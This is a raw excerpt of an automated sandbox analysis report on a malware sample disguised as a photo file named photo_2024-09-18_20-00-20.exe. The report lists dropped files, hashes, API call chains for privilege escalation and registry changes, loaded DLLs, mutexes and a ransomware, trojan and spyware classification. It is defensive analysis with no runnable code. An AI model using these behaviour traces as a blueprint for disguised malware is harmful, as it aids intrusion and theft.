                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C20255_2_6C3C2025
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C70035_2_6C3C7003
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3BB07C5_2_6C3BB07C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F20A35_2_6C3F20A3
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C37E0D85_2_6C37E0D8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3AA1925_2_6C3AA192
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C35E1C85_2_6C35E1C8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3582795_2_6C358279
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D026A5_2_6C3D026A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3B32665_2_6C3B3266
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3682B25_2_6C3682B2
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3E62A65_2_6C3E62A6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3B62E85_2_6C3B62E8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F42E15_2_6C3F42E1
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3BF32A5_2_6C3BF32A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3563745_2_6C356374
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C83685_2_6C3C8368
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3BE35C5_2_6C3BE35C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3BC38C5_2_6C3BC38C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C38A3865_2_6C38A386
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F93C95_2_6C3F93C9
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\EjXjKxze\MSVCP140.dll 885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C35C822 appears 40 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C35CB4D appears 878 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D7ECE appears 72 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D1F84 appears 938 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D9165 appears 42 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3714FC appears 136 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D3864 appears 346 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3E9148 appears 46 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 03ED2EF0 appears 33 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C372962 appears 66 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D7820 appears 148 times
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: String function: 6C3D23D3 appears 38 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 00493819 appears 50 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 00496F50 appears 37 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 004890A5 appears 42 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 00455B40 appears 48 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 004937B0 appears 69 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 004159B4 appears 33 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 00501C20 appears 47 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 004017BC appears 39 times
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: String function: 0048B66B appears 93 times
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289116617.0000000003650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs photo_2024-09-18_20-00-20.exe
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.0000000000860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUplayCrashj vs photo_2024-09-18_20-00-20.exe
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@5/8@1/2
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004496F0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,0_2_004496F0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02471776 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_02471776
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024718EE OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_024718EE
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024718A4 AdjustTokenPrivileges,0_2_024718A4
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_100018A0 AdjustTokenPrivileges,0_2_100018A0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_100018EA OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,OpenProcess,OpenProcessToken,CloseHandle,AdjustTokenPrivileges,GetLengthSid,SetTokenInformation,0_2_100018EA
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10001772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_10001772
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB8B20 CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,4_2_03EB8B20
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB9070 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_03EB9070
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB8C40 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_03EB8C40
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044A310 _memmove,GetDiskFreeSpaceExW,0_2_0044A310
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00449320 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32NextW,CloseHandle,0_2_00449320
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0247324F _memset,_memset,_memset,__time64,_memset,_rand,_rand,_memset,wsprintfA,_memset,_memset,wsprintfA,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,Sleep,Sleep,__time64,_memset,_rand,_memset,_memset,_memset,_mbstowcs,_memset,_memset,_strcat_s,FindWindowExA,Sleep,Sleep,GlobalAddAtomA,_memset,_memset,_memset,_memset,_mbstowcs,_memset,_memset,_memset,_strcat_s,FindWindowExA,Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,_memset,LoadLibraryA,_memset,GetProcAddress,_memset,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,0_2_0247324F
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0041B3B4 __EH_prolog3_GS,CreateFileW,GetFileSize,ReadFile,CloseHandle,FindResourceW,LoadResource,FreeResource,SizeofResource,LockResource,_memmove,FreeResource,CreateFileW,GetFileSize,ReadFile,CloseHandle,_memset,CreateDIBSection,_free,0_2_0041B3B4
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Program Files (x86)\EjXjKxzeJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\lon2[1].bmpJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 9.12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMutant created: \Sessions\1\BaseNamedObjects\MyProgramMutex
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: Duoyi.com-Launcher
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: %s /S "/unpack=%s" /launch=off
                      Source: 8VhJ2Jq.exeString found in binary or memory: <!--StartFragment -->
                      Source: 8VhJ2Jq.exeString found in binary or memory: <!--StartFragment -->
                      Source: 8VhJ2Jq.exeString found in binary or memory: <!--StartFragment -->
                      Source: 8VhJ2Jq.exeString found in binary or memory: <!--StartFragment -->
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: %02d:%02d%n%02d:%02d:%02d%n%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]AddDllDirectory\/LoadLibraryExAkernel32Bad content-encoding foundWrite errorMalformed encoding foundIllegal or missing hexadecimal sequenceToo long hexadecimal numberauth-confauth-intauthqop="algorithm=realm="nonce="username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s%08x%08x%08x%08xmd5-sessAUTHENTICATE00000001%s, algorithm="%s"%s, opaque="%s"username="%s", realm="%s", nonce="%s", uri="%s", response="%s"username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"%s:%s:%08x:%s:%s:%sd41d8cd98f00b204e9800998ecf8427e%s:%s:%sMD5MD5-sessalgorithmqopopaquerealmstalenonce
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: set-addPolicy
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: id-cmc-addExtensions
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: DuoyiLauncher.exe\" --auto"Duoyi.com-Launcherfile='icon_up.png' dest='0,0,15,15'file='icon_down.png' dest='0,0,15,15'
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: ~EndProcessAndDelFile, path:%sTerminateProcess, pid:%u\bin\\patch\uninst.exeLauncher.initg.idGameSettings.iniEndProcessAndDelFile end\MiniLog\StartInstallExe begin%s /S "/unpack=%s" /launch=offStartupWithOSFromGameClientIDprogress_time:%d@b
                      Source: unknownProcess created: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe "C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe"
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeProcess created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe"
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeProcess created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: snmpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: photo_2024-09-18_20-00-20.exeStatic file information: File size 2957312 > 1048576
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ac000
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                      Source: Binary string: E:\ZM_SOUI\independent\GameInstall\Release\GameInstall.pdb source: photo_2024-09-18_20-00-20.exe
                      Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
